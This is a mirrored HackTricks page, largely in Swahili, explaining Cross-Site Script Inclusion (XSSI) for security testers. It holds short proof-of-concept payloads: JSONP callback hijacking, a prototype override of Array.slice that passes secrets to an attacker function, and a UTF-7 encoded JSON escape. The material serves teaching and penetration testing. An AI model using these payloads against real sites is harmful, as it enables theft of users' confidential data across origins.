mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
99 lines
7.5 KiB
Markdown
99 lines
7.5 KiB
Markdown
# XSSI (Cross-Site Script Inclusion)
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
|
|
## Basic Information
|
|
|
|
**Cross-Site Script Inclusion (XSSI)** ni udhaifu unaotokana na asili ya lebo ya `script` katika HTML. Tofauti na rasilimali nyingi, ambazo zinategemea **Same-Origin Policy (SOP)**, scripts zinaweza kujumuishwa kutoka maeneo tofauti. Tabia hii inakusudia kuwezesha matumizi ya maktaba na rasilimali nyingine zinazohifadhiwa kwenye seva tofauti lakini pia inaletee hatari ya usalama.
|
|
|
|
### Key Characteristics of **XSSI**:
|
|
- **Bypass of SOP**: Scripts hazihusishwa na **Same-Origin Policy**, zikiruhusiwa kujumuishwa kati ya maeneo.
|
|
- **Data Exposure**: Mshambuliaji anaweza kutumia tabia hii kusoma data iliyopakiwa kupitia lebo ya `script`.
|
|
- **Impact on Dynamic JavaScript/JSONP**: **XSSI** ni muhimu hasa kwa JavaScript ya dinamik au **JSON with Padding (JSONP)**. Teknolojia hizi mara nyingi hutumia taarifa za "ambient-authority" (kama vidakuzi) kwa ajili ya uthibitishaji. Wakati ombi la script linapotolewa kwa mwenyeji tofauti, akreditif hizi (mfano, vidakuzi) hujumuishwa moja kwa moja katika ombi.
|
|
- **Authentication Token Leakage**: Ikiwa mshambuliaji anaweza kumdanganya kivinjari cha mtumiaji kutafuta script kutoka seva wanayodhibiti, wanaweza kuwa na uwezo wa kupata taarifa nyeti zilizomo katika maombi haya.
|
|
|
|
### Types
|
|
|
|
1. **Static JavaScript** - Hii inawakilisha aina ya kawaida ya XSSI.
|
|
2. **Static JavaScript with Authentication** - Aina hii ni tofauti kwa sababu inahitaji uthibitishaji ili kufikia.
|
|
3. **Dynamic JavaScript** - Inahusisha JavaScript inayounda maudhui kwa njia ya dinamik.
|
|
4. **Non-JavaScript** - Inarejelea udhaifu ambao hauhusishi JavaScript moja kwa moja.
|
|
|
|
**Taarifa ifuatayo ni muhtasari wa [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)**. Angalia kwa maelezo zaidi.
|
|
|
|
|
|
### Regular XSSI
|
|
Katika mbinu hii, taarifa za faragha zimejumuishwa ndani ya faili ya JavaScript inayopatikana kwa urahisi duniani. Wavamizi wanaweza kubaini faili hizi kwa kutumia mbinu kama kusoma faili, kutafuta maneno, au matumizi ya kawaida ya kawaida. Mara baada ya kupatikana, script inayoshikilia taarifa za faragha inaweza kujumuishwa katika maudhui ya uhalifu, ikiruhusu ufikiaji usioidhinishwa wa data nyeti. Mbinu moja ya mfano ya unyakuzi inaonyeshwa hapa chini:
|
|
```html
|
|
<script src="https://www.vulnerable-domain.tld/script.js"></script>
|
|
<script> alert(JSON.stringify(confidential_keys[0])); </script>
|
|
```
|
|
### Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
|
|
Aina hizi za mashambulizi ya XSSI zinahusisha taarifa za siri kuongezwa kwa njia ya kidinamikia kwenye script kama jibu la ombi la mtumiaji. Ugunduzi unaweza kufanywa kwa kutuma maombi yenye na bila kuki na kulinganisha majibu. Ikiwa taarifa zinatofautiana, inaweza kuashiria uwepo wa taarifa za siri. Mchakato huu unaweza kuandaliwa kwa kutumia zana kama [DetectDynamicJS](https://github.com/luh2/DetectDynamicJS) nyongeza ya Burp.
|
|
|
|
Ikiwa data za siri zimehifadhiwa katika variable ya kimataifa, zinaweza kutumika kwa kutumia mbinu zinazofanana na zile zinazotumika katika XSSI ya Kawaida. Hata hivyo, ikiwa data za siri zimejumuishwa katika jibu la JSONP, washambuliaji wanaweza kuiba kazi ya callback ili kupata taarifa hizo. Hii inaweza kufanywa kwa kubadilisha vitu vya kimataifa au kuanzisha kazi itakayotekelezwa na jibu la JSONP, kama inavyoonyeshwa hapa chini:
|
|
```html
|
|
<script>
|
|
var angular = function () { return 1; };
|
|
angular.callbacks = function () { return 1; };
|
|
angular.callbacks._7 = function (leaked) {
|
|
alert(JSON.stringify(leaked));
|
|
};
|
|
</script>
|
|
<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
|
|
```
|
|
|
|
```html
|
|
<script>
|
|
leak = function (leaked) {
|
|
alert(JSON.stringify(leaked));
|
|
};
|
|
</script>
|
|
<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
|
|
```
|
|
Kwa mabadiliko ya *prototype tampering* kwa mabadiliko ya mabadiliko yasiyo katika nafasi ya kimataifa, mara nyingine inaweza kutumika. Mbinu hii inatumia muundo wa JavaScript, ambapo tafsiri ya msimbo inahusisha kupita kwenye mnyororo wa prototype ili kupata mali inayoitwa. Kwa kubadilisha kazi fulani, kama vile `Array`'s `slice`, washambuliaji wanaweza kufikia na kuvuja mabadiliko yasiyo ya kimataifa:
|
|
```javascript
|
|
Array.prototype.slice = function(){
|
|
// leaks ["secret1", "secret2", "secret3"]
|
|
sendToAttackerBackend(this);
|
|
};
|
|
```
|
|
Further details on attack vectors can be found in the work of Security Researcher [Sebastian Lekies](https://twitter.com/slekies), who maintains a list of [vectors](http://sebastian-lekies.de/leak/).
|
|
|
|
### Non-Script-XSSI
|
|
Utafiti wa Takeshi Terada unintroduces aina nyingine ya XSSI, ambapo faili za Non-Script, kama CSV, zinavuja cross-origin kwa kuingizwa kama vyanzo katika `script` tag. Matukio ya kihistoria ya XSSI, kama shambulio la Jeremiah Grossman la mwaka 2006 kusoma kitabu kamili cha anwani za Google na uvujaji wa data wa JSON wa Joe Walker wa mwaka 2007, yanaonyesha ukali wa vitisho hivi. Zaidi ya hayo, Gareth Heyes anaelezea toleo la shambulio linalohusisha JSON iliy encoded kwa UTF-7 ili kutoroka muundo wa JSON na kutekeleza scripts, ambayo ni bora katika vivinjari fulani:
|
|
```javascript
|
|
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
|
|
```
|
|
|
|
```html
|
|
<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>
|
|
```
|
|
{% hint style="success" %}
|
|
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
{% endhint %}
|